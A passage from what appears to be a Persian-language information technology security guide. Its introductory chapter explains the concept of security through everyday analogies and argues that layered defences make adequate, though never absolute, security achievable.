‫ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﺮﺍﻱ ﻛﻤﻚ ﺑﻪ ﺷـﻤﺎ ﺩﺭ ﺍﻧﺠـﺎﻡ ﺍﻳـﻦ ﻣﻬـﻢ ﺗﻬﻴـﻪ ﻭ‬
‫ﺗﺪﻭﻳﻦ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺍﻣﻨﻴﺖ ﭼﻴﺴﺖ؟‬
‫‪21‬‬
‫‪22‬‬
‫ﻣﻔﻬﻮﻡ ﺍﻣﻨﻴﺖ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺑﺮﺍﻱ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺎ ﺣﻴﺎﺗﻲ ﺍﺳﺖ‪.‬‬
‫ﺩﺭ ﺩﻭﺭﺍﻥ ﻣﺎﻗﺒﻞ ﺗﺎﺭﻳﺦ‪ ،‬ﺍﻣﻨﻴﺖ ﻋﺒﺎﺭﺕ ﺑﻮﺩ ﺍﺯ ﺍﺻﻮﻝ ﺣﻔـﻆ ﺑﻘـﺎ؛‬
‫ﻧﻈﻴﺮ ﺍﻣﻨﻴﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻠﺔ ﺩﻳﮕﺮﺍﻥ ﻳﺎ ﺣﻴﻮﺍﻧـﺎﺕ‪ ،‬ﻭ ﻧﻴـﺰ ﺍﻣﻨﻴـﺖ‬
‫ﺗﺄﻣﻴﻦ ﻏﺬﺍ‪.‬‬
‫‪Crackers‬‬
‫‪24‬‬
‫ﺑﺨﺶ ﺍﻭﻝ‬
‫ﻭﻟﻲ ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﻫﻤﻮﺍﺭﻩ ﻣﺨﺎﻃﺮﺍﺗﻲ ﺟﺪﻱ ﻣﺎﻧﻨـﺪ ﺍﺯ ﺩﺳـﺖ ﺩﺍﺩﻥ‬
‫ﺳﻮﺍﺑﻖ‪ ،‬ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ‪ ،‬ﺧـﺮﺍﺏ ﺷـﺪﻥ ﺍﻃﻼﻋـﺎﺕ ﻭ‬
‫ﺳﺎﻳﺮ ﺍﻧﻮﺍﻉ ﺣﻤﻼﺕ ﺧﺼﻤﺎﻧﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﺯ ﺩﺳﺖ ﺭﻓﺘﻦ ﺗﻤﺎﻡ ﻳـﺎ‬
‫ﺑﺨﺸﻲ ﺍﺯ ﺳﻮﺍﺑﻖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺷﺮﻛﺖ ﺭﺍ ﺯﻣﻴﻨﮕﻴـﺮ‬
‫ﻛﻨﺪ‪ .‬ﺑﺮﺍﻱ ﻛﺸﻮﺭﻱ ﻛﻪ ﺍﻣﻨﻴﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺁﻥ ﺿـﻌﻴﻒ‬
‫ﺍﺳﺖ ﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻨـﺎﺑﻊ ﺣﻴـﺎﺗﻲ ﺁﻥ ﺩﺭ ﻣﻌـﺮﺽ‬
‫ﺧﻄﺮ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﻭ ﺑﻪ ﺁﻧﻬﺎ ﺻﺪﻣﺎﺕ ﺟﺒﺮﺍﻥ ﻧﺎﭘـﺬﻳﺮﻱ ﻭﺍﺭﺩ ﺷـﻮﺩ‪.‬‬
‫ﻋﺪﻡ ﺗﻮﺟﻪ ﻛﺎﻓﻲ ﺑﻪ ﺍﻣﻨﻴﺖ ﺑـﺮﺍﻱ ﻛـﺸﻮﺭﻫﺎﻳﻲ ﻛـﻪ ﺑـﻪ ﺭﻭﺍﺑـﻂ‬
‫ﺧﺎﺭﺟﻲ ﺩﺭ ﺻﻨﺎﻳﻊ ﺧﻮﺩ ﺍﻫﻤﻴـﺖ ﻣـﻲﺩﻫﻨـﺪ ﻣـﻲﺗﻮﺍﻧـﺪ ﻣﻮﺟـﺐ‬
‫ﺧﺴﺎﺭﺗﻬﺎﻱ ﺟﺪﻱ ﻭ ﭘﻴﺶ ﺑﻴﻨﻲ ﻧﺸﺪﻩ ﺍﻱ ﮔﺮﺩﺩ‪ .‬ﻧﻴﻞ ﺑـﻪ ﺍﻫـﺪﺍﻑ‬
‫ﺗﻮﺳﻌﺔ ﻫﺰﺍﺭﻩ )‪ ٢٢(MDG‬ﺑﻪ ﺗﻮﺍﻧﺎﻳﻲ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺩﺭ‬
‫ﺍﺳﺘﻔﺎﺩﺓ ﻣﺆﺛﺮ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺍﻓـﺰﺍﻳﺶ ﺑﻮﺩﺟـﺔ ﺁﻧﻬـﺎ ﺑـﺎ‬
‫‪٢٣‬‬
‫ﻋﻀﻮﻳﺖ ﺩﺍﺋﻤﻲ ﺩﺭ ﺳـﺎﺯﻣﺎﻥ ﺗﺠـﺎﺭﺕ ﺟﻬـﺎﻧﻲ ﺑـﺴﺘﮕﻲ ﺩﺍﺭﺩ‪.‬‬
‫ﺗﻮﺍﻧﺎﻳﻲ ﻛﺴﺐ ﻭ ﺗﺄﻣﻴﻦ ﺍﻃﻼﻋﺎﺕ ﻣﻨﺎﺳﺐ ﻣـﻲﺗﻮﺍﻧـﺪ ﺩﺭ ﺗﻤـﺎﻣﻲ‬
‫ﺯﻣﻴﻨﻪﻫﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﺑﻪ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻛﻤﻚ ﻛﻨﺪ‪.‬‬
‫ﺳﻴــﺴﺘﻤﻬﺎ ﻭﺍﺭﺩ ﺷــﻮﻧﺪ ﻭ ﻣــﺸﻜﻼﺗﻲ ﺑﻮﺟــﻮﺩ ﺑﻴﺎﻭﺭﻧــﺪ‪ .‬ﺑﻴــﺸﺘﺮ‬
‫ﻣﺸﻜﻼﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺍﺯ ﺟﺎﻧﺐ ﺧﺮﺍﺑﻜﺎﺭﻫﺎ‪ ٢٤‬ﻧﺎﺷـﻲ‬
‫ﻣﻲﺷﻮﺩ‪ .‬ﺧﺮﺍﺑﻜﺎﺭﻫﺎ ﺍﻓﺮﺍﺩﻱ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺛﺎﺑـﺖ ﻛﻨﻨـﺪ‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻫﺮ ﺳﺪ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺳﺮ ﺭﺍﻫﺸﺎﻥ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ‬
‫ﻋﺒﻮﺭ ﻛﻨﻨﺪ‪ .‬ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﻢ ﭼﻨـﻴﻦ ﺭﻓﺘـﺎﺭﻱ ﺭﺍ ﺩﺭ ﺩﻧﻴـﺎﻱ ﻭﺍﻗﻌـﻲ‬
‫ﻣﺪﻝ ﻛﻨﻴﻢ ﺑﺎﻳﺪ ﻓﺮﺩﻱ ﻣﻮﺭﺩ ﺍﺷﺎﺭﻩ ﻗﺮﺍﺭ ﺩﻫـﻴﻢ ﻛـﻪ ﻣـﻲﺧﻮﺍﻫـﺪ‬
‫ﺛﺎﺑﺖ ﻛﻨﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺧﺎﻧﻪ ﺷﻤﺎ ﻭﺍﺭﺩ ﺷﻮﺩ ﻭ ﺳﭙﺲ ﺑﺪﻭﻥ ﺩﺳﺖ‬
‫ﺯﺩﻥ ﺑﻪ ﭼﻴﺰﻱ ﺧﺎﺭﺝ ﺷﻮﺩ! ﭼﻨﻴﻦ ﭘﺪﻳﺪﻩﺍﻱ ﻧﻪﺗﻨﻬﺎ ﻣﻮﺟﺐ ﺑـﺮﻭﺯ‬
‫ﻧﻮﻋﻲ ﺍﺣﺴﺎﺱ ﻋﺪﻡ ﺍﻃﻤﻴﻨﺎﻥ ﻣﻲﺷﻮﺩ‪ ،‬ﺑﻠﻜﻪ ﺍﻳﻦ ﺳـﺆﺍﻝ ﺭﺍ ﻧﻴـﺰ‬
‫ﭘﺪﻳﺪ ﻣﻲﺁﻭﺭﺩ ﻛﻪ ﭼﻪ ﭼﻴﺰﻱ ﺩﺭﺣﺎﻝ ﺗﻐﻴﻴﺮ ﻳﺎﻓﺘﻦ ﻳـﺎ ﻛـﻢ ﺷـﺪﻥ‬
‫ﺍﺳﺖ ﻳـﺎ ﺍﻳﻨﻜـﻪ ﭼـﻪ ﺍﻗـﺪﺍﻣﺎﺗﻲ ﻣـﻲﺗـﻮﺍﻥ ﺑـﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ‬
‫ﻧﻔﻮﺫﻫﺎﻱ ﺑﻌﺪﻱ ﺍﻧﺠـﺎﻡ ﺩﺍﺩ‪ .‬ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ ﭼﻨـﻴﻦ ﺭﻓﺘـﺎﺭﻱ ﺩﺭ‬
‫ﺩﻧﻴــﺎﻱ ﻭﺍﻗﻌــﻲ ﻗﺎﺑــﻞ ﺗﺤﻤــﻞ ﻧﻴــﺴﺖ‪ ،‬ﺩﺭ ﻓــﻀﺎﻱ ﺳــﺎﻳﺒﺮ ﻫــﻢ‬
‫ﻧﻤﻲﺗﻮﺍﻥ ﺍﻳﻦ ﺭﻓﺘﺎﺭ ﺭﺍ ﺗﺤﻤﻞ ﻛﺮﺩ‪ .‬ﻓﻨﻮﻥ ﻣﻮﺟﻮﺩ ﺩﺭ ﺍﻳﻦ ﻛﺘـﺎﺏ‬
‫ﺑﻪ ﺷﻤﺎ ﺩﺭ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺧﻮﺩﺗـﺎﻥ ﺩﺭ ﻣﻘﺎﺑـﻞ ﭼﻨـﻴﻦ ﺭﻓﺘﺎﺭﻫـﺎﻳﻲ‬
‫ﻛﻤﻚ ﺧﻮﺍﻫﺪ ﻧﻤﻮﺩ‪.‬‬
‫‪٣٢‬‬
‫ﻧﻴﺎﺯﻫﺎﻱ ﺩﻳﮕﺮ ﭼﻮﻥ ﺍﻣﻨﻴﺖ ﺩﺭ ﻣﻘﺎﺑﻞ ﺣﻮﺍﺩﺙ ﻃﺒﻴﻌﻲ ﻳﺎ ﺑﻴﻤﺎﺭﻳﻬﺎ‬
‫ﻋﻤﻮﻣﹰﺎ ﺑﺮﺍﻱ ﺍﻧﺴﺎﻧﻬﺎﻱ ﻣﺎﻗﺒﻞ ﺗﺎﺭﻳﺦ ﻣﻄﺮﺡ ﻧﺒـﻮﺩ‪ .‬ﺑـﺎ ﭘﻴـﺸﺮﻓﺖ‬
‫ﺗﻤﺪﻥ‪ ،‬ﻣﺤﺪﻭﺩﺓ ﺍﻣﻨﻴﺖ ﻓﺮﺍﺗﺮ ﺭﻓﺘﻪ ﻭ ﺍﺑﻌـﺎﺩ ﻭﺳـﻴﻌﺘﺮﻱ ﻣﺎﻧﻨـﺪ ﺩﺭ‬
‫ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻦ ﻣﻜﺎﻧﻲ ﺑﺮﺍﻱ ﺁﺳﺎﻳﺶ ﻭ ﺯﻧﺪﮔﻲ ﺑﻲﺧﻄـﺮ ﺭﺍ ﺩﺭ ﺑـﺮ‬
‫ﮔﺮﻓﺖ ﻭ ﺍﻣﺮﻭﺯﻩ ﻣﻔﻬﻮﻡ ﺍﻣﻮﺍﻝ ﺷﺨﺼﻲ ﻧﻴﺰ ﺑـﻪ ﺗﻌﺮﻳـﻒ ﺍﻣﻨﻴـﺖ‬
‫ﺍﺿﺎﻓﻪ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺑﻴﺸﺘﺮ ﺁﻧﭽﻪ ﻛﻪ ﻣﺎ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻴﻢ ﺑﺎ ﻣﺨـﺎﻃﺮﻩ‬
‫ﻫﻤﺮﺍﻩ ﺍﺳﺖ؛ ﻫﺮﭼﻨﺪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻤﺎﻥ ﻣﺨﺎﻃﺮﺓ ﻛﻤﻲ ﺩﺭ‬
‫ﻼ ﻭﻗﺘﻲ ﺑﻪ ﻫﻤﺮﺍﻩ ﺷﺨﺼﻲ ﻧﺎﺁﺷﻨﺎ ﺑﻪ ﺳﻔﺮ ﻣﻲﺭﻭﻳـﻢ‬
‫ﭘﻲ ﺩﺍﺭﺩ‪ .‬ﻣﺜ ﹰ‬
‫ﻭ ﻳﺎ ﺑﻪ ﺷﻬﺮ ﻳﺎ ﻛﺸﻮﺭﻱ ﻧﺎﺁﺷﻨﺎ ﻭﺍﺭﺩ ﻣﻲﺷـﻮﻳﻢ ﺍﻳـﻦ ﺣﻘﻴﻘـﺖ ﺭﺍ‬
‫ﻣﻲﺩﺍﻧﻴﻢ ﻛﻪ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺟـﺴﻤﻲﻣـﺎﻥ ﺗﻬﺪﻳـﺪﺍﺗﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪.‬‬
‫ﺗﻬﺪﻳﺪﺍﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺍﻃﺮﺍﻑ ﻣﺎ ﻭﻗﺘﻲ ﺟﺪﻱ ﺧﻮﺍﻫﻨﺪ ﺷﺪ ﻛـﻪ ﻣـﺎ‬
‫ﺩﺭ ﻣﻜﺎﻧﻲ ﺣﻔﺎﻇﺖﻧﺸﺪﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻳﻢ ﻭ ﺑﺎ ﻓـﺮﺩﻱ ﺭﻭﺑـﺮﻭ ﺷـﻮﻳﻢ‬
‫ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺍﺯ ﻣﻮﻗﻌﻴﺖ ﻣﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪ .‬ﺍﮔﺮ ﺑﻪ ﺍﻧـﺪﺍﺯﺓ ﻛـﺎﻓﻲ‬
‫ﺑﻪ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻃﺮﺍﻑ ﺧـﻮﺩ ﺗﻮﺟـﻪ ﻛﻨـﻴﻢ ﻣﻮﻓـﻖ ﺧـﻮﺍﻫﻴﻢ ﺷـﺪ‬
‫ﻼ ﻫﻤﺮﺍﻩ ﻛـﺴﻲ‬
‫ﻣﻜﺎﻧﻲ ﺍﻣﻦ ﭘﻴﺪﺍ ﻛﻨﻴﻢ ﻳﺎ ﺭﺍﻩ ﭼﺎﺭﻩﺍﻱ ﺑﻴﺎﺑﻴﻢ؛ ﻣﺜ ﹰ‬
‫ﺷﻮﻳﻢ ﻛﻪ ﻣﺎ ﺭﺍ ﺑﻪ ﻣﻜﺎﻥ ﺍﻣﻨﻲ ﻫﺪﺍﻳﺖ ﻛﻨـﺪ‪ ،‬ﻳـﺎ ﻳـﻚ ﺗﺎﻛـﺴﻲ‬
‫ﺑﮕﻴﺮﻳﻢ‪.‬‬
‫ﺑﻌﻀﻲ ﺍﺯ ﻛﺎﺭﻫﺎ ﻣﺨﺎﻃﺮﺍﺕ ﺭﻭﺍﻧﺸﻨﺎﺧﺘﻲ ﻳﺎ ﻣﺎﻟﻲ ﺑﻪ ﻫﻤﺮﺍﻩ ﺩﺍﺭﻧـﺪ‬
‫ﻭﻟﻲ ﻣﺨﺎﻃﺮﺓ ﺟﺴﻤﻲ ﻧﺪﺍﺭﻧﺪ‪ .‬ﻭﻗﺘﻲ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻣﻲﻛﻨـﻴﻢ )ﺩﺭ‬
‫ﻫﺮﻳﻚ ﺍﺯ ﺍﺷﻜﺎﻝ ﺧﺮﻳﺪ ﺯﻣﻴﻦ‪ ،‬ﺳﻬﺎﻡ ﻳﺎ ﺣﺘﻲ ﻓﻌﺎﻟﻴﺖ ﺩﺭ ﺗﺠﺎﺭﺕ ﻭ ﻳﺎ ﻛـﺎﺭ ﺩﺭ‬
‫ﺑﺎﺯﺍﺭ( ﺍﻧﺘﻈﺎﺭ ﺩﺍﺭﻳﻢ ﻛﻪ ﺍﻳﻦ ﺳﺮﻣﺎﻳﻪ ﻫﺮﭼﻪ ﺯﻭﺩﺗﺮ ﺑﻪ ﻣـﺎ ﺑـﺎﺯﮔﺮﺩﺩ‪.‬‬
‫ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻣﻲﺩﺍﻧﻴﻢ ﺑﻌـﻀﻲ ﺍﺯ ﺳـﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻳﻬﺎ ﺩﻳـﺮ ﻳـﺎ ﺯﻭﺩ‬
‫ﺑﺎﺯﺧﻮﺍﻫﻨﺪ ﮔﺸﺖ؛ ﺣﺎﻝ ﺁﻧﻜﻪ ﺑﻌﻀﻲ ﺍﺯ ﺳﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻳﻬﺎ ﺍﻳﻨﮕﻮﻧـﻪ‬
‫ﻼ ﻭﻗﺘﻲ‬
‫ﻧﻴﺴﺘﻨﺪ ﻭ ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﻫﻢ ﺑﻪ ﺯﻳﺎﻥ ﻣﻨﺠﺮ ﻣﻲﺷﻮﻧﺪ‪ .‬ﻣﺜ ﹰ‬
‫ﺑﺎ ﺷﺨﺺ ﺟﺪﻳﺪﻱ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻣﻲﻛﻨﻴﻢ ﺍﻣﻴـﺪﻭﺍﺭﻳﻢ ﻛـﻪ ﺍﻳـﻦ‬
‫ﺭﺍﺑﻄﺔ ﺟﺪﻳﺪ ﺑﺮﺍﻳﻤﺎﻥ ﺁﻭﺭﺩﻩﺍﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﻫﺮﭼﻨـﺪ ﺧﻄـﺮ ﺍﻳـﻦ‬
‫ﻣﺴﺌﻠﻪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺍﻳـﻦ ﺭﺍﺑﻄـﻪ ﺍﺯ ﻓﺎﻳـﺪﺓ ﻻﺯﻡ ﺑﺮﺧـﻮﺭﺩﺍﺭ‬
‫ﻧﺒﺎﺷﺪ ﺭﺍ ﻧﻴﺰ ﻣﻲﭘﺬﻳﺮﻳﻢ‪.‬‬
‫ﺩﺭ ﺑﻌﻀﻲ ﺯﻣﻴﻨﻪﻫﺎ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺳﻄﺤﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻛﻪ ﺍﻧﺘﻈﺎﺭ ﺁﻧﺮﺍ‬
‫ﻼ ﻫﻤﻴـﺸﻪ ﻣـﺎﻳﻠﻴﻢ ﻋﻤـﺮﻱ ﻃـﻮﻻﻧﻲ ﻭ‬
‫ﺩﺍﺭﻳﻢ ﻣﻤﻜﻦ ﻧﻴﺴﺖ‪ .‬ﻣﺜ ﹰ‬
‫ﺟﺴﻤﻲ ﺳﺎﻟﻢ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﻢ؛ ﻭﻟﻲ ﺁﻧﭽـﻪ ﻛـﻪ ﺩﺭ ﻣﻌـﺪﻝ ﺁﻣـﺎﺭﻱ‬
‫ﻃﻮﻝ ﻋﻤﺮ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻧﺸﺎﻥ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﺑـﺮﺍﻱ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻓﺮﺍﺩ ﺻﺪﻕ ﻧﻤﻲﻛﻨﺪ‪ .‬ﺑﻌﻀﻲ ﺍﺯ ﻣـﺎ ﺩﺭ ﺳـﻨﻴﻦ ﭘـﺎﺋﻴﻦ‬
‫ﻣﻲﻣﻴﺮﻳﻢ‪ ،‬ﺗﻌﺪﺍﺩﻱ ﺩﺭ ﻃﻮﻝ ﺣﻴﺎﺕ ﺑﺎ ﺑﻴﻤﺎﺭﻳﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺩﺳـﺖ‬
‫ﻭ ﭘﻨﺠﻪ ﻧﺮﻡ ﻣﻲﻛﻨﻴﻢ‪ ،‬ﻭ ﺑﺮﺧﻲ ﺗﺎ ﺳﺎﻟﻴﺎﻥ ﺩﺭﺍﺯ ﺯﻧﺪﻩ ﻣﻲﻣـﺎﻧﻴﻢ ﻭ‬
‫ﻋﻤﺮﻱ ﺑﻪ ﺳﻼﻣﺖ ﺭﻭﺯﮔﺎﺭ ﻣﻲﮔﺬﺭﺍﻧﻴﻢ‪ .‬ﻋـﺪﻡ ﺗﻮﺍﻧـﺎﻳﻲ ﺧـﻮﺩ ﺩﺭ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺗﻌﻴﻴﻦ ﺳﺮﻧﻮﺷﺖ ﺭﺍ ﺑﺎ ﺑﻴﻤﻪ ﺟﺒﺮﺍﻥ ﻣﻲﻛﻨـﻴﻢ ﺗـﺎ ﻣـﺎ ﺭﺍ ﺩﺭ ﺑﺮﺍﺑـﺮ‬
‫ﺍﺛﺮﺍﺕ ﻣﻨﻔﻲ ﻣﺎﻟﻲ‪ ،‬ﺣﻮﺍﺩﺙ ﻭ ﺑﻴﻤﺎﺭﻳﻬﺎ ﺣﻔﺎﻇﺖ ﻛﻨﺪ‪.‬‬
‫ﺍﻳﻦ ﻣﻘﺪﻣﻪ ﺣﻘﻴﻘﺘﻲ ﺭﺍ ﺩﺭﺑﺎﺭﺓ ﺍﻣﻨﻴﺖ ﭘﻴﺶ ﺭﻭﻱ ﻣﺎ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ‪:‬‬
‫ﺍﻣﻨﻴﺖ ﻣﻄﻠﻖ ﭼﻪ ﺩﺭ ﺯﻧـﺪﮔﻲ ﻭﺍﻗﻌـﻲ ﻭ ﭼـﻪ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ‬
‫ﻏﻴﺮﻣﻤﻜﻦ ﻭ ﻣﺤﺎﻝ ﺍﺳﺖ؛ ﻭﻟﻲ ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ‬
‫ﻛــﺎﻓﻲ ﻣﻨﺎﺳــﺐ ﺑﺎﺷــﺪ ﺗﻘﺮﻳﺒــﹰﺎ ﺩﺭ ﺗﻤــﺎﻣﻲ ﺷــﺮﺍﻳﻂ ﻣﺤﻴﻄــﻲ‬
‫ﺩﺳﺖﻳﺎﻓﺘﻨﻲ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﻲ‬
‫ﺭﺍﻫﻬﺎﻱ ﮔﻮﻧﺎﮔﻮﻧﻲ ﺑﺮﺍﻱ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﮔﺮﻓﺘﻦ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺗﻘـﻮﻳﺘ ﹺ‬
‫ﺍﻓﺰﺍﻳﺶ ﻭ ﺣﻔﻆ ﺍﻣﻨﻴﺖ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻣﺎ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻱ ﻓﻴﺰﻳﻜـﻲ‬
‫ﺑﺮﺍﻱ ﺗﻀﻤﻴﻦ ﺍﻣﻨﻴﺖ ﺧﻮﺩ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻫﺴﺘﻴﻢ‪ :‬ﺳﺎﺧﺘﻤﺎﻧﻬﺎﻱ ﺑﻠﻨﺪ ﻭ‬
‫ﻣﺴﺘﺤﻜﻢ ﻭ ﺩﺭﻫﺎﻱ ﻣﺤﻜـﻢ ﻭ ﻧﻔﻮﺫﻧﺎﭘـﺬﻳﺮ ﺑـﻪ ﻫﻤـﺮﺍﻩ ﻗﻔﻠﻬـﺎ ﻭ‬
‫ﻛﻠﻴﺪﻫﺎﻱ ﺑﻲﺷﻤﺎﺭ‪ .‬ﻣﺎ ﻣﻲﺗﻮﺍﻧﻴﻢ ﺑﻪ ﻣﺮﺯﻫﺎﻱ ﻓﻴﺰﻳﻜﻲ ﺩﻳﮕﺮ ﻣﺜﻞ‬
‫ﺩﻳﻮﺍﺭﻫﺎ ﻭ ﺩﻳﮕـﺮ ﻣﻮﺍﻧـﻊ ﺟﺪﺍﺳـﺎﺯ ﻧﻴـﺰ ﺗﻜﻴـﻪ ﻛﻨـﻴﻢ‪ .‬ﻫﻤﭽﻨـﻴﻦ‬
‫ﻣﻲﺗﻮﺍﻧﻴﻢ ﺭﻭﻱ ﻣﻨﺎﻃﻘﻲ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﺁﻧﻬﺎ ﺍﺣﺘﻤﺎﻝ ﻧﻔﻮﺫ ﻣـﻲﺭﻭﺩ‬
‫ﻧﻮﺭ ﻛﺎﻓﻲ ﻣﺘﻤﺮﻛﺰ ﻛﻨﻴﻢ‪ .‬ﻧﻬﺎﻳﺘﹰﺎ ﺍﻳﻨﻜﻪ ﺩﺭﺻﻮﺭﺕ ﻟﺰﻭﻡ ﻣﻲﺗﻮﺍﻥ ﺑﺎ‬
‫ﺍﻳــﻦ ﻓــﺮﺽ ﻛــﻪ ﺍﻗــﺪﺍﻣﺎﺕ ﻧﻔــﻮﺫﻱ ﺍﻭﻟﻴــﻪ ﻣﻮﻓــﻖ ﺑﺎﺷــﻨﺪ ﺍﺯ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻫﺸﺪﺍﺭﺩﻫﻨﺪﻩ ﻭ ﻣﺤﺎﻓﻈﻬﺎﻱ ﻗﻮﻳﺘﺮ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻭ‬
‫ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﻛﺴﺎﻧﻴﻜﻪ ﻣﻮﻓﻖ ﺑﻪ ﻧﻔﻮﺫ ﺷﺪﻩﺍﻧﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ‪ .‬ﻣﻬﻤﺘـﺮ‬
‫ﺍﺯ ﻫﻤﻪ ﺍﻳﻨﻜﻪ ﻣﻲﺗﻮﺍﻧﻴﻢ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻗﻮﺍﻧﻴﻦ ﻋﻤﻮﻣﻲ ﻭ ﺟﺰﺍﻳﻲ ﻭ‬
‫ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﻧﻴﺰ ﺩﺭﺧﻮﺍﺳﺖ ﻛﻤﻚ ﻧﻤﺎﻳﻴﻢ‪.‬‬
‫ﻻ ﺍﺯ ﭼﻨﺪﻳﻦ ﺭﻭﺵ ﻣﺨﺘﻠﻒ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺍﻣﻨﻴـﺖ ﺧـﻮﺩ‬
‫ﻣﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﻢ ﺗﺎ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻳﻜﻲ ﺍﺯ ﺗﺪﺍﺑﻴﺮ ﻣﻔﻴﺪ ﻭﺍﻗﻊ ﻧـﺸﺪ‬
‫ﺩﻳﮕﺮﻱ ﺧﻼﺀ ﺁﻧﺮﺍ ﭘﺮ ﻛﻨﺪ‪ .‬ﺍﮔﺮ ﻳﻜﻲ ﺍﺯ ﻛﻠﻴﺪﻫﺎ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺖ ﻭ‬
‫ﻞ ﺩﺭ ﺍﺯ ﺁﻥ ﭘﺲ ﺣﻔﺎﻅ ﻣﻄﻤﺌﻨﻲ ﺑﻪ ﺷﻤﺎﺭ ﻧﻤﻲﺭﻓﺖ‪ ،‬ﻣﻲﺗﻮﺍﻥ‬
‫ﻗﻔ ﹺ‬
‫ﺍﺯ ﻋﻼﺋﻢ ﻫﺸﺪﺍﺭﺩﻫﻨﺪﻩ ﺑﺮﺍﻱ ﺍﻋﻼﻡ ﺧﻄـﺮ ﻧﻔـﻮﺫ ﺍﺳـﺘﻔﺎﺩﻩ ﻛـﺮﺩ‪.‬‬
